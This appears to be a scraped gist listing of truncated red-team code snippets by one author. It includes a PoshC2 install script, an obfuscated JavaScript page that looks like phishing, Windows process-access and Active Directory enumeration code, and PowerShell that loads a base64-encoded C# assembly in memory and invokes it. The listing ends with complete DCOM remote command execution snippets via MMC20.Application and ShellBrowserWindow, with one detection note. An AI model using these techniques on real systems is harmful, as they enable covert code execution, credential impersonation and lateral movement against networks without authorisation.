benpturner

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Image Thumbnails</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css" integrity="sha384-KyZXEAg3QhqLMpG8r+Knujsl5/1ov5I55g5m3g3/1eL7gyMT_TXLa21u8N2D/xM" crossorigin="anonymous">
    <style>
        body {
            font-family: Arial, Helvetica, sans-serif;

benpturner

#!/usr/bin/env python3

# Install
# ========
# cd /opt/PoshC2/
# pipenv install pefile
# pipenv install flask
# pipenv install flask-httpauth
# pipenv install pysqlite3

benpturner

<html lang="en">
<head>
  <meta charset="UTF-8"/>
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
</head>
<body id="dkwpoo" data-poirqw="user@user.com">
<script type="text/javascript">
<!-- 

function polpol(npdpmmu){var hudf=""; var arzhmfva= npdpmmu.split("4183775721");

benpturner

#define _CRT_SECURE_NO_WARNINGS

#include <iostream>
#include <windows.h>
#include <psapi.h>

typedef struct _PS_ATTRIBUTE {
    ULONG Attribute;
    SIZE_T Size;
    union {

benpturner

using System;
using System.Collections.Generic;
using System.Management;
using System.DirectoryServices;
using System.DirectoryServices.ActiveDirectory;
using System.Text;
using System.Runtime.Serialization.Formatters.Binary;
using System.IO;
using System.Collections;
using System.Runtime.InteropServices;

benpturner

using System;
using System.Collections.Generic;
using System.Diagnostics.Eventing.Reader;
using System.Text.RegularExpressions;
using System.Threading;

namespace EventLogSearcher
{
    class Program
    {	

benpturner

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;

namespace GetAPICall
{
    class Program
    {
        const uint PROCESS_ALL_ACCESS = 0x000F0000 | 0x00100000 | 0xFFF;

benpturner

# Load C# Module in PS
[System.Reflection.Assembly]::LoadFile("C:\Temp\StandIn.exe") 

# Load C# Module in PS from Base64 Blob
$dllbytes = [System.Convert]::FromBase64String("fdsfdsfds")
[System.Reflection.Assembly]::Load($dllbytes)

# Execute C# Module in PS
$Mods=[System.AppDomain]::CurrentDomain.GetAssemblies()
foreach ($Mod in $Mods){if ($Mod.FullName -like "StandIn*") {$Mod.EntryPoint.Invoke($null,@(,[string[]]@(""))) }}

benpturner

 Add-Type -TypeDefinition @"
    using System;
    using System.Runtime.InteropServices;
    using System.Security.Principal;
    public static class Advapi32
    {
        [DllImport("advapi32.dll", SetLastError = true)]
        public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken);

        [DllImport("advapi32.dll", SetLastError=true)]

benpturner

# MMC (Tested Windows 7, Windows 10, Server 2012R2):
dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1"));
c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7");

## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process)

# ShellBrowserWindow (Tested Windows 10, Server 2012R2):
System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1");
dynamic obj = System.Activator.CreateInstance(com);
obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0);